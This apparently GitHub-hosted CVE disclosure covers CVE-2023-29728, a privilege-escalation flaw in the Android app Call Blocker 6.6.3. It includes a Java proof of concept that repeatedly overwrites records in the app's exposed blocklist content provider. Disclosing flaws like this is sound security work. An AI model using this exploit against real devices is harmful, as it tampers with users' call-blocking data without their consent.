Skip to content

Latest commit

 

History

History
31 lines (19 loc) · 985 Bytes

CVE detail.md

File metadata and controls

31 lines (19 loc) · 985 Bytes

Escalation of Privileges exists in Call Blocker(CVE-2023-29728)

Vendor:Fiorenza Francesco(https://www.call-blocker.info/)

Affected product:Call Blocker(com.cuiet.blockCalls)

Version:6.6.3

Download link: https://play.google.com/store/apps/details?id=com.cuiet.blockCalls

Description of the vulnerability for use in the CVE:The Call Blocker application 6.6.3 for Android allows attackers to tamper with feature-related data, resulting in a severe elevation of privilege attack.

poc:

public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    while (true) {
        Uri uri = Uri.parse("content://com.cuiet.blockCalls.ContProvBlockCalls/tbBlackList");
        ContentValues contentValues = new ContentValues();
        contentValues.put("photo_uri","123456789");
        contentValues.put("numeroContatto","987654321");
        contentResolver.update(uri,contentValues,null,null);
    }
}